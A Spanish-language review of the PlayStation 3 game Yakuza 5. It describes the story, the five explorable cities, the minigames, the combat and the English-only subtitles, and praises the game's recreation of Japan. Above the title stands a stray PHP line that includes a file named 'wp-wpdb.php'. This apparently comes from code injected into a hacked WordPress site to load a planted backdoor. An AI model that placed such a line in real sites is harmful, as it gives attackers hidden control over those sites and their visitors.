if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Yakuza 5 – La Fortaleza de LeChuck

Análisis Yakuza 5

Si hay una saga que sabe acercarnos la subcultura japonesa esa es Yakuza, la serie de Sega que nos sumerge en el mundo de la mafia japonesa y nos ofrece un montón de lugares con minijuegos y diversión. Yakuza 5 ha llegado a occidente mientras la próxima entrega está a punto de salir del horno. Venga, vámonos de viaje por Japón.

yakuza5

La saga Yakuza no es especialmente conocida en occidente, de hecho, nunca ha tenido demasiada promoción y la temática tan sumamente japonesa lo hacen un tanto especial. Además, tan solo el original vino con los textos en español. Por lo tanto, después de 5 títulos, y varios spin-offs, alguien que quisiera dar el paso podría sentirse un tanto intimidado, pero para aquellos que no quieran empezar desde el comienzo os puedo asegurar que Yakuza 5 será igualmente disfrutable. Y ahora bien, ¿de qué va esto?

La historia de Yakuza 5 gira en torno a Kazuma Kiryu, el protagonista de la saga, que se esconde en Fukuoka con un nombre falso, viviendo una vida tranquila como taxista para que su hija adoptiva pueda triunfar como idol sin ser salpicada por el pasado su padre. Sin embargo, a pesar de haberse alejado de su antiguo clan Tojo, la desaparición del actual líder después de firmar una alianza con otro importante clan le involucran de nuevo en la acción. ¿Conseguirá Kiryu ayudar a sus excolegas y desvelar la misteriosa desaparición de Dojima sin ocasionar una gran guerra yakuza?

yakuza5-4
Varios protagonistas e historias que se entremezclan

La trama del juego está llena de momentos intensos y emocionantes, tristes y divertidos, repartidos por la misiones principales y secundarias a través de 5 personajes jugables y sus respectivos arcos argumentales. Jugablemente es similar a títulos anteriores, y también dispone de dos modos de juego: el modo aventura y modo combate. El primero permite a los jugadores explorar diferentes áreas y participar en las atracciones que ofrece la ciudad, incluyendo los minijuegos. En este modo podemos trabajar de taxista, irnos al pachinko y, en definitiva, disfrutar libremente del juego. En el modo combate tenemos que defender nuestro clan lidiando con matones de poca monta y eliminar grupos yakuza y jefes, como dictan las misiones del juego. El cambio entre ambos es más fluido en comparación con los anteriores juegos y saltaremos entre uno y otro sin darnos apenas cuenta. La exploración en Yakuza 5 se amplía con cinco zonas diferentes de Japón: Osaka, Sapporo, Nagoya, Tokyo y Fukuoka y cada una de ellas tiene un tamaño considerable, añadiendo una gran cantidad de puntos de interés al mapa.

La ambientación sigue siendo uno de los platos fuertes y será una gozada para los amantes de Japón. La recreación de las calles es espectacular y recorrer las diferentes avenidas, toparse con conbinis extremadamente parecidos al 7 Eleven o entrar en los almacenes Don Quijote (famosos almacenes japoneses donde hay de todo barato) es una experiencia apasionante. Para hacerlo todo más creíble, los carteles y los objetos de los establecimientos utilizan fotos reales de productos existentes en Japón, me hizo especialmente gracia las latas de café Boss, un clásico de las vending machine. Ante este panorama, mi morriña de Japón se disparaba y me daban (y dan) ganas de hacer las maletas y volverme. Es realmente fascinante pararse en la acera y ver el ir y venir de los transeúntes y poder incluso escuchar sus conversaciones.

En el apartado visual, Yakuza 5 destaca en el realismo, es decir, los personajes y NPCS parecen ciudadanos japoneses, la fisionomía e indumentaria es puramente japonesa, también el comportamiento, es así como se distancia de la recurrente estética anime «kawaii y moe», lo que otorga al juego un aspecto mucho más maduro. Por otro lado, Yakuza 5 se ve de maravilla en PS3, el juego cuenta con un nuevo motor gráfico y atrás quedó el viejo motor de Yakuza 3.

yakuza5-5
Bonitos gráficos y estupenda ambientación. Creerás que estás en Japón.

Quería destacar algunos puntos de interés del mapa, los cuales están diferenciados por colores, y son lugares estupendos para divertirnos y desconectar de tanta acción. Tenemos establecimientos para comprar todo tipo de artículos, degustar la mejor comida o simplemente disfrutar de sus atracciones, y precisamente estos son los locales que más horas de diversión nos van a proporcionar. Tenemos el Club Sega, un centro recreativo con varias máquinas, allí encontramos las Ufo Catcher donde por 100 yenes tenemos varios intentos para sacar alguna figura de Nights o Miku, por suerte es mucho más fácil que en la realidad (nos costó la vida sacar algo del Club Sega de Akihabara), pasamos a las recreativa de Virtual Fighter 2, para dar unos mamporros virtuales en 1P o 2P (posibilidad de modo multijugador), también puedes sacarte unas purikura o jugar al Taiko no Tatsujin, el popular juego de ritmo con tambores. Seguimos paseando por la zona de entretenimiento de la ciudad y nos topamos con varios pubs para caballeros, los Hostess club, donde se escoge una señorita para que nos haga compañía en un espacio reservado, y si tras varias visitas nuestra afinidad con ella aumenta quizá quiera quedar fuera del horario de trabajo. ¿Quieres algo más tranquilo? Ve al conbini a leer manga, están disponible los primeros capítulos de cómics tan populares como Shingeki no Kyojin o Fairy Tail. Estas y otras atracciones te están esperando por el mapa, tendrás que descubrirlas.

yakuza5-2
¿Unas partidillas?

Bueno, pero aquí no acaba la cosa, también tenemos actividades paralelas que pondrán a prueba nuestra habilidad. Podemos tomar parte en las carreras callejeras ilegales… con nuestro taxi. Aunque si preferimos respetar las normas de tráfico, están las misiones de taxista, en las cuales podemos ganar puntos por conducir prudentemente, llegar a tiempo al destino marcado y dar una buena conversación, sí, habéis leído bien, nuestros clientes pondrán a prueba nuestras dotes comunicativas y comprensivas y deberemos dar con la respuesta correcta mientras intentamos no saltarnos un semáforo en rojo. Si no os va la conducción, podéis aprender a ser cocinero haciendo ramen a la velocidad de la luz. A medida que el juego avanza nuevas actividades se desbloquearán.

yakuza5-6
Nuestro taxi se podrá tunear, incluso podremos ponerle publicidad

Echemos otro vistazo al mapa, además de los locales disponibles, vemos unos interrogantes que nos desbloquearán mini misiones la mar de curiosas no relacionadas con la trama principal. Unos cuantos ejemplos: ayudar a un niña a regresar con su padre, hacer de cocinero porque al dueño le ha entrado lumbago o repasar junto a un estudiante las preguntas del examen de acceso a la universidad. Mil y una historias nos esperan por toda la ciudad en estas pequeñas mini aventuras que nos proporcionarán puntos de experiencia y yenes.

Misiones principales, secundarias y diversión por toda la ciudad, pero ¿y las peleas? Pues habrán muchas. Las zonas de entretenimiento están controladas por los yakuza, por lo tanto, matones de todo tipo buscarán pelea al pasar por tu lado. Podemos evitarlos pulsando un botón o usando objetos, pero si queremos practicar con los puños y ganar experiencia es un buen entrenamiento. Las peleas son cuerpo a cuerpo, con diferentes golpes especiales y combinaciones que se van desbloquendo a medida que subimos de nivel, de esta forma aprendemos nuevos golpes y potenciamos los que ya disponemos. En el lugar de combate también podemos coger objetos variados: bicis, papeleras, señales de tráfico… ideal para asestar un golpe múltiple y llevarnos por delante a varios enemigos. Los macarras de poca monta serán fáciles de quitar de en medio, el problema son los yakuza rivales de las misiones principales, donde tendremos que sacar el máximo jugo a nuestros golpes para acabar con ellos. Si tras varios intentos no los eliminamos, el juego nos preguntará si deseamos bajar el nivel de dificultad. A medida que avancemos en la historia conoceremos individuos que nos proporcionarán armas y blindaje, indispensable para salir ileso más adelante.

yakuza5-3
Los golpes especiales incluyen estampar enemigos contra objetos del escenario

Hasta ahora todo tiene buena pinta, ¿verdad? Vayamos a lo único negativo del juego: solo tiene subtítulos en inglés, y requiere de un nivel medio para enterarse bien. Al ser un juego que trata asuntos entre la mafia japonesa y sus negocios habrán muchos términos que quizá se os escapen, pero si el idioma no es un problema para vosotros, vais a disfrutar de lo lindo. En cuanto a las voces, el doblaje japonés es espectacular, como nos tienen acostumbrado los japoneses, que siempre dan en el clavo con los seiyuu. El apartado sonoro también es digno de mención y la banda sonora acompaña bien a la trama con temas vocales, ambientales y frenéticos para deleitarnos con la acción.

En conclusión, estamos ante un juego que nos hace sentirnos el protagonista de una película que lucha para dejar atrás un pasado que le arrastra una y otra vez a su antigua vida. Una historia intensa y atractiva y un mapa rico en lugares de interés. Un juego amplio y diverso donde es imposible hallar el aburrimiento.